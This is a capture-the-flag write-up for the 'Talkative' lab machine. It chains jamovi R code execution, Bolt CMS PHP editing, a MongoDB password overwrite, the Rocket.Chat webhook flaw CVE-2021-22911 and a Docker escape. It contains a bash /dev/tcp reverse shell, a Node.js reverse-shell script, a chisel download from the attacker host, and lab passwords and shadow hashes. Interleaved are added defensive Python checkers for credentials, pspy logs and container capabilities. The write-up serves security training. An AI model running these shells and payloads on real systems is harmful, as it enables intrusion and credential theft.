Basic information

Port scan

22, 80, 3000, 8080, 8081 and 8082; note that 22 is filtered by the firewall and cannot be reached from outside:

$ nmap -sC -sV 10.10.11.155
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-21 13:35 CST
Nmap scan report for 10.10.11.155
Host is up (0.22s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Debian)
|_http-title: Did not follow redirect to http://talkative.htb
3000/tcp open ppp?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| X-XSS-Protection: 1
| X-Instance-ID: W8u2yS8skXBJ9hTgb
| Content-Type: text/html; charset=utf-8
| Vary: Accept-Encoding
| Date: Thu, 21 Apr 2022 05:36:17 GMT
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <link rel="stylesheet" type="text/css" class="__meteor-css__" href="/3ab95015403368c507c78b4228d38a494ef33a08.css?meteor_css_resource=true">
| <meta charset="utf-8" />
| <meta http-equiv="content-type" content="text/html; charset=utf-8" />
| <meta http-equiv="expires" content="-1" />
| <meta http-equiv="X-UA-Compatible" content="IE=edge" />
| <meta name="fragment" content="!" />
| <meta name="distribution" content="global" />
| <meta name="rating" content="general" />
| <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" />
| <meta name="mobile-web-app-capable" content="yes" />
| <meta name="apple-mobile-web-app-capable" conten
| HTTPOptions:
| HTTP/1.1 200 OK
| X-XSS-Protection: 1
| X-Instance-ID: W8u2yS8skXBJ9hTgb
| Content-Type: text/html; charset=utf-8
| Vary: Accept-Encoding
| Date: Thu, 21 Apr 2022 05:36:19 GMT
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <link rel="stylesheet" type="text/css" class="__meteor-css__" href="/3ab95015403368c507c78b4228d38a494ef33a08.css?meteor_css_resource=true">
| <meta charset="utf-8" />
| <meta http-equiv="content-type" content="text/html; charset=utf-8" />
| <meta http-equiv="expires" content="-1" />
| <meta http-equiv="X-UA-Compatible" content="IE=edge" />
| <meta name="fragment" content="!" />
| <meta name="distribution" content="global" />
| <meta name="rating" content="general" />
| <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" />
| <meta name="mobile-web-app-capable" content="yes" />
| <meta name="apple-mobile-web-app-capable" conten
| Help, NCP:
|_ HTTP/1.1 400 Bad Request
8080/tcp open http Tornado httpd 5.0
|_http-server-header: TornadoServer/5.0
|_http-title: jamovi
8081/tcp open http Tornado httpd 5.0
|_http-server-header: TornadoServer/5.0
|_http-title: 404: Not Found
8082/tcp open http Tornado httpd 5.0
|_http-server-header: TornadoServer/5.0
|_http-title: 404: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.92%I=7%D=4/21%Time=6260ED52%P=x86_64-apple-darwin20.4.
SF:0%r(GetRequest,31BA,"HTTP/1\.1\x20200\x20OK\r\nX-XSS-Protection:\x201\r
SF:\nX-Instance-ID:\x20W8u2yS8skXBJ9hTgb\r\nContent-Type:\x20text/html;\x2
SF:0charset=utf-8\r\nVary:\x20Accept-Encoding\r\nDate:\x20Thu,\x2021\x20Ap
SF:r\x202022\x2005:36:17\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x
SF:20html>\n<html>\n<head>\n\x20\x20<link\x20rel=\"stylesheet\"\x20type=\"
SF:text/css\"\x20class=\"__meteor-css__\"\x20href=\"/3ab95015403368c507c78
SF:b4228d38a494ef33a08\.css\?meteor_css_resource=true\">\n<meta\x20charset
SF:=\"utf-8\"\x20/>\n\t<meta\x20http-equiv=\"content-type\"\x20content=\"t
SF:ext/html;\x20charset=utf-8\"\x20/>\n\t<meta\x20http-equiv=\"expires\"\x
SF:20content=\"-1\"\x20/>\n\t<meta\x20http-equiv=\"X-UA-Compatible\"\x20co
SF:ntent=\"IE=edge\"\x20/>\n\t<meta\x20name=\"fragment\"\x20content=\"!\"\
SF:x20/>\n\t<meta\x20name=\"distribution\"\x20content=\"global\"\x20/>\n\t
SF:<meta\x20name=\"rating\"\x20content=\"general\"\x20/>\n\t<meta\x20name=
SF:\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1,\x20ma
SF:ximum-scale=1,\x20user-scalable=no\"\x20/>\n\t<meta\x20name=\"mobile-we
SF:b-app-capable\"\x20content=\"yes\"\x20/>\n\t<meta\x20name=\"apple-mobil
SF:e-web-app-capable\"\x20conten")%r(Help,1C,"HTTP/1\.1\x20400\x20Bad\x20R
SF:equest\r\n\r\n")%r(NCP,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")
SF:%r(HTTPOptions,31BA,"HTTP/1\.1\x20200\x20OK\r\nX-XSS-Protection:\x201\r
SF:\nX-Instance-ID:\x20W8u2yS8skXBJ9hTgb\r\nContent-Type:\x20text/html;\x2
SF:0charset=utf-8\r\nVary:\x20Accept-Encoding\r\nDate:\x20Thu,\x2021\x20Ap
SF:r\x202022\x2005:36:19\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x
SF:20html>\n<html>\n<head>\n\x20\x20<link\x20rel=\"stylesheet\"\x20type=\"
SF:text/css\"\x20class=\"__meteor-css__\"\x20href=\"/3ab95015403368c507c78
SF:b4228d38a494ef33a08\.css\?meteor_css_resource=true\">\n<meta\x20charset
SF:=\"utf-8\"\x20/>\n\t<meta\x20http-equiv=\"content-type\"\x20content=\"t
SF:ext/html;\x20charset=utf-8\"\x20/>\n\t<meta\x20http-equiv=\"expires\"\x
SF:20content=\"-1\"\x20/>\n\t<meta\x20http-equiv=\"X-UA-Compatible\"\x20co
SF:ntent=\"IE=edge\"\x20/>\n\t<meta\x20name=\"fragment\"\x20content=\"!\"\
SF:x20/>\n\t<meta\x20name=\"distribution\"\x20content=\"global\"\x20/>\n\t
SF:<meta\x20name=\"rating\"\x20content=\"general\"\x20/>\n\t<meta\x20name=
SF:\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1,\x20ma
SF:ximum-scale=1,\x20user-scalable=no\"\x20/>\n\t<meta\x20name=\"mobile-we
SF:b-app-capable\"\x20content=\"yes\"\x20/>\n\t<meta\x20name=\"apple-mobil
SF:e-web-app-capable\"\x20conten");
Service Info: Host: 172.17.0.18

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.53 seconds

80

A hosts entry is needed:

10.10.11.155 talkative.htb

Bolt cms:

3000

rocket chat:

8080

jamovi 0.9.5.5:

8081/8082

Accessing them directly gives 404: Not Found

jamovi

The jamovi instance on 8080 can run R code directly; it is running inside a container:

system("bash -c 'id && hostname'", intern = TRUE) 
system("bash -c 'bash -i >& /dev/tcp/10.10.14.14/4444 0>&1'",intern=TRUE)

bolt-administration.omv

There is a bolt-administration.omv file in the /root directory. Download it for analysis; since downloading from the container is awkward, just base64 it. An omv file is a zip archive, so unzip it directly; among the extracted files, xdata.json yields several sets of usernames and passwords:

base64 bolt-administration.omv

echo xxxx | base64 -d > bolt-administration.omv
unzip bolt-administration.omv

xdata.json

{
  "A": {
    "labels": [
      [0, "Username", "Username", false],
      [1, "matt@talkative.htb", "matt@talkative.htb", false],
      [2, "janit@talkative.htb", "janit@talkative.htb", false],
      [3, "saul@talkative.htb", "saul@talkative.htb", false]
    ]
  },
  "B": {
    "labels": [
      [0, "Password", "Password", false],
      [1, "jeO09ufhWD<s", "jeO09ufhWD<s", false],
      [2, "bZ89h}V<S_DA", "bZ89h}V<S_DA", false],
      [3, ")SQWGm>9KHEA", ")SQWGm>9KHEA", false]
    ]
  },
  "C": {
    "labels": []
  }
}
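The defensive counterpart of the step above is to catch analysis workbooks that carry plaintext credentials before they are left in a home directory. The following is an added example (mine, not code from the writeup) that opens a jamovi .omv archive, reads its xdata.json and flags any label column whose header looks like a secret. It assumes the layout seen in the file above, where the label entry with code 0 carries the column header and the remaining entries are the values; the sample archive it builds in memory uses constructed placeholder accounts rather than the real ones.

```python
import io
import json
import re
import zipfile

# Header names that indicate a column of secrets (case-insensitive).
SENSITIVE_HEADER = re.compile(r"pass(word|wd)?|secret|token|api[_ -]?key", re.I)


def parse_xdata(xdata):
    """Return {column_key: (header, [values])} from a jamovi xdata.json object.

    Assumption taken from the writeup's file: each labels entry is
    [code, label, display_label, pinned] and the entry with code 0 is the
    column header text; every other entry is a data value.
    """
    columns = {}
    for key, col in xdata.items():
        labels = col.get("labels", [])
        if not labels:
            continue
        header, values = None, []
        for code, label, _display, _pinned in labels:
            if code == 0:
                header = label
            else:
                values.append(label)
        columns[key] = (header, values)
    return columns


def find_credential_columns(omv_bytes):
    """Scan an .omv archive (a zip) and report columns with secret-like headers."""
    with zipfile.ZipFile(io.BytesIO(omv_bytes)) as zf:
        xdata = json.loads(zf.read("xdata.json"))
    findings = []
    for key, (header, values) in parse_xdata(xdata).items():
        if header and SENSITIVE_HEADER.search(header):
            findings.append({"column": key, "header": header, "values": len(values)})
    return findings


def build_sample_omv():
    """Constructed sample mirroring the layout of the writeup's xdata.json."""
    xdata = {
        "A": {"labels": [[0, "Username", "Username", False],
                         [1, "alice@example.test", "alice@example.test", False],
                         [2, "bob@example.test", "bob@example.test", False]]},
        "B": {"labels": [[0, "Password", "Password", False],
                         [1, "placeholder-pw-1", "placeholder-pw-1", False],
                         [2, "placeholder-pw-2", "placeholder-pw-2", False]]},
        "C": {"labels": []},
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("xdata.json", json.dumps(xdata))
    return buf.getvalue()


if __name__ == "__main__":
    for hit in find_credential_columns(build_sample_omv()):
        print(f"column {hit['column']} ({hit['header']}): {hit['values']} secret values")
```

Pointing `find_credential_columns` at real files (read the .omv bytes from disk) turns this into a cheap pre-share check for jamovi workbooks; the regex is deliberately broad, so treat a hit as something to review, not as proof.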

Bolt cms

From what is known so far, port 80 runs Bolt CMS and the credentials came from bolt-administration, so go back to 80 and try reusing the passwords at the default Bolt CMS login path. Login succeeds; Bolt version 5.1.3:

http://talkative.htb/bolt/login

admin : jeO09ufhWD<s

Edit a PHP file directly from the admin backend to get a www-data shell in another container:

Settings -> Configuration -> All configuration files; open and modify a PHP file there, then visit any page to trigger it:

http://talkative.htb/bolt/file-edit/config?file=/bundles.php

Upgrade the tty; there is no python, so it can be upgraded like this:

script -qc /bin/bash /dev/null

user flag

From inside the container, ssh to the host works, reusing the credentials obtained earlier:

script -qc /bin/bash /dev/null

ssh saul@10.10.11.155
jeO09ufhWD<s

mongo

Running pspy reveals mongo-related activity; on inspection, mongo is yet another container:

2022/04/09 21:31:01 CMD: UID=0    PID=79640  | /bin/sh -c cp /root/.backup/passwd /etc/passwd 
2022/04/09 21:31:01 CMD: UID=0 PID=84170 | cp /root/.backup/shadow /etc/shadow
2022/04/09 21:51:01 CMD: UID=0 PID=84169 | python3 /root/.backup/update_mongo.py
2022/04/09 21:51:01 CMD: UID=0 PID=84172 | python3 /root/.backup/update_mongo.py

saul@talkative:~/.ssh$ netstat -ano | grep 27017
netstat -ano | grep 27017
tcp 0 0 172.17.0.1:42930 172.17.0.2:27017 TIME_WAIT timewait (44.67/0/0)
tcp 0 0 172.17.0.1:42928 172.17.0.2:27017 TIME_WAIT timewait (44.67/0/0)
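The pspy output above is exactly the kind of process-execution record a host agent would produce, and the two root jobs that rewrite /etc/passwd and /etc/shadow from a backup directory are worth an alert on any host. The following is an added example (mine, not from the writeup) that parses pspy-style lines and flags root commands that write into sensitive system files. The sample log is the writeup's own lines plus a constructed benign line and a non-matching line, to show what is and is not reported.

```python
import re
from dataclasses import dataclass

# pspy line layout: "YYYY/MM/DD HH:MM:SS CMD: UID=<n> PID=<n> | <command>"
PSPY_RE = re.compile(
    r"^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) CMD: "
    r"UID=(?P<uid>\d+)\s+PID=(?P<pid>\d+)\s+\|\s*(?P<cmd>.*?)\s*$"
)

# A copy/move/tee or a shell redirect whose destination is a sensitive file.
WRITE_RE = re.compile(
    r"(?:\b(?:cp|mv|install|tee)\b[^|;&]*?\s|>\s*)"
    r"(/etc/(?:passwd|shadow|sudoers))(?=\s|$)"
)


@dataclass
class ProcEvent:
    ts: str
    uid: int
    pid: int
    cmd: str


def parse_pspy(lines):
    """Parse pspy output; lines that do not match the format are skipped."""
    events = []
    for line in lines:
        m = PSPY_RE.match(line)
        if m:
            events.append(ProcEvent(m["ts"], int(m["uid"]), int(m["pid"]), m["cmd"]))
    return events


def flag_sensitive_writes(events, uid=0):
    """Return (event, target) pairs where a process of `uid` writes a sensitive file."""
    flagged = []
    for ev in events:
        if ev.uid != uid:
            continue
        m = WRITE_RE.search(ev.cmd)
        if m:
            flagged.append((ev, m.group(1)))
    return flagged


# Constructed sample: the writeup's pspy lines, one benign read by a normal user,
# and one line that is not pspy output at all.
SAMPLE_LOG = """\
2022/04/09 21:31:01 CMD: UID=0    PID=79640  | /bin/sh -c cp /root/.backup/passwd /etc/passwd 
2022/04/09 21:31:01 CMD: UID=0 PID=84170 | cp /root/.backup/shadow /etc/shadow
2022/04/09 21:51:01 CMD: UID=0 PID=84169 | python3 /root/.backup/update_mongo.py
2022/04/09 21:51:01 CMD: UID=1000 PID=84200 | cat /etc/passwd
not a pspy line
"""


if __name__ == "__main__":
    events = parse_pspy(SAMPLE_LOG.splitlines())
    for ev, target in flag_sensitive_writes(events):
        print(f"{ev.ts} root pid {ev.pid} rewrote {target}: {ev.cmd}")
```

The same two regexes work on auditd or EDR process-creation records once the timestamp/uid/pid fields are mapped; the interesting signal is a privileged job restoring account files on a schedule, which is how the credentials on this box keep being reset.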

Forward the port and enumerate the database; it yields rocket.cat-related information. The password cannot be cracked, but it can be replaced with the hash of a known plaintext:

# remote
wget 10.10.14.14:7777/chisel_1.7.6_linux_amd64
./chisel_1.7.6_linux_amd64 client 10.10.14.14:6969 R:27017:172.17.0.2:27017

# local
./chisel_1.7.0-rc7_darwin_amd64 server -p 6969 --reverse

# mongo
brew install mongosh
mongosh "mongodb://LOCALHOST:27017"

show databases
use admin
show tables
db.system.keys.find()
use meteor
show tables
db.users.find()

# plaintext 12345
db.getCollection('users').update({username:"admin"}, { $set: {"services" : { "password" : {"bcrypt" : "$2a$10$n9CM8OgInDlwpvjLKLPML.eizXIzLlRtgCh3GRLafOdR9ldAUh/KG" } } } })

Rocket.Chat

Log in to Rocket.Chat on port 3000 with the modified password; version 2.4.14:

A search turns up a related vulnerability:

CVE-2021-22911

Integrations webhooks run custom Node.js code; after adding one, the curl command used to invoke it is shown. Running it triggers the script and gives root in that container:

curl -X POST -H 'Content-Type: application/json' --data '{"username":"miao","text":"Example message","attachments":[{"title":"Rocket.Chat","title_link":"https://rocket.chat","text":"Rocket.Chat, the best open source chat","image_url":"/images/integration-attachment-example.png","color":"#764FA5"}]}' http://10.10.11.155:3000/hooks/YemLLtCAsASjTYtF6/8zLfJzKrSodq2o7owhfdbFjwknGXmXE3mJbH9eeMzsxmuBmL

reverse.js

const require = console.log.constructor('return process.mainModule.require')();
var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(4444, "10.10.14.14", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});

Docker escape & root flag

There is no curl or wget, so again write the file in via base64 and run it; modify the C code yourself to read the file contents needed:

// get a FS reference from something mounted in from outside
if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0)
die("[-] open");

if (find_handle(fd1, "/root/root.txt", &root_h, &h) <= 0)
die("[-] Cannot find valid handle!");

# local
gcc shocker.c -o shocker
base64 shocker

# target
echo xxx | base64 -d > shocker
chmod +x shocker
./shocker
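The escape above only works because the container was started with a capability set that includes CAP_DAC_READ_SEARCH, which is what open_by_handle_at() needs to walk the host filesystem. An added example (mine, not from the writeup) that audits this from inside a container: it reads the CapEff line of /proc/self/status, decodes the bitmask with the bit numbers from linux/capability.h, and reports capabilities a hardened container should not hold. The two sample status texts are constructed; the first uses the widely documented Docker default effective set (00000000a80425fb), the second a full root set, as seen in a privileged or cap-add'ed container.

```python
import re

# Capability bit numbers from <linux/capability.h> (subset relevant here).
CAP_BITS = {
    "CAP_CHOWN": 0, "CAP_DAC_OVERRIDE": 1, "CAP_DAC_READ_SEARCH": 2, "CAP_FOWNER": 3,
    "CAP_FSETID": 4, "CAP_KILL": 5, "CAP_SETGID": 6, "CAP_SETUID": 7, "CAP_SETPCAP": 8,
    "CAP_NET_BIND_SERVICE": 10, "CAP_NET_ADMIN": 12, "CAP_NET_RAW": 13,
    "CAP_SYS_MODULE": 16, "CAP_SYS_RAWIO": 17, "CAP_SYS_CHROOT": 18, "CAP_SYS_PTRACE": 19,
    "CAP_SYS_ADMIN": 21, "CAP_MKNOD": 27, "CAP_AUDIT_WRITE": 29, "CAP_SETFCAP": 31,
}

# Capabilities that a hardened container should not carry, and why.
RISKY = {
    "CAP_DAC_READ_SEARCH": "open_by_handle_at() can reach host files (what shocker relies on)",
    "CAP_SYS_ADMIN": "mount and many other host-affecting operations",
    "CAP_SYS_PTRACE": "can attach to and inspect other processes",
    "CAP_SYS_MODULE": "can load kernel modules",
    "CAP_SYS_RAWIO": "raw device and port I/O",
}


def parse_cap_eff(status_text):
    """Extract the effective capability mask from /proc/<pid>/status text."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)\s*$", status_text, re.M)
    if not m:
        raise ValueError("no CapEff line in status text")
    return int(m.group(1), 16)


def decode_caps(mask):
    """Names of the known capabilities whose bit is set in `mask`."""
    return {name for name, bit in CAP_BITS.items() if (mask >> bit) & 1}


def risky_caps(status_text):
    """Sorted (name, reason) pairs for risky capabilities in the effective set."""
    present = decode_caps(parse_cap_eff(status_text))
    return sorted((name, RISKY[name]) for name in present if name in RISKY)


def audit_self(path="/proc/self/status"):
    """Run the check against the current process (works inside a container)."""
    with open(path) as f:
        return risky_caps(f.read())


# Constructed samples: Docker's default effective set, and a full root set.
SAMPLE_DEFAULT = "Name:\tsh\nCapInh:\t0000000000000000\nCapPrm:\t00000000a80425fb\nCapEff:\t00000000a80425fb\n"
SAMPLE_FULL = "Name:\tsh\nCapInh:\t0000000000000000\nCapPrm:\t000001ffffffffff\nCapEff:\t000001ffffffffff\n"


if __name__ == "__main__":
    for label, text in (("default", SAMPLE_DEFAULT), ("full", SAMPLE_FULL)):
        hits = risky_caps(text)
        print(f"{label}: {'clean' if not hits else ''}")
        for name, why in hits:
            print(f"  {name}: {why}")
```

With the default set the check is clean, which is the point: the escape needs an operator to have added the capability (or run the container privileged). Dropping everything and adding back only what the workload needs (`--cap-drop ALL` plus explicit `--cap-add`) keeps CapEff at or below the default.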

shadow

root:$6$9GrOpvcijuCP93rg$tkcyh.ZwH5w9AHrm66awD9nLzMHv32QqZYGiIfuLow4V1PBkY0xsKoyZnM3.AI.yGWfFLOFDSKsIR9XnKLbIY1:19066:0:99999:7:::
saul:$6$19rUyMaBLt7.CDGj$ik84VX1CUhhuiMHxq8hSMjKTDMxHt.ldQC15vFyupafquVyonyyb3/S6MO59tnJHP9vI5GMvbE9T4TFeeeKyg1:19058:0:99999:7:::

References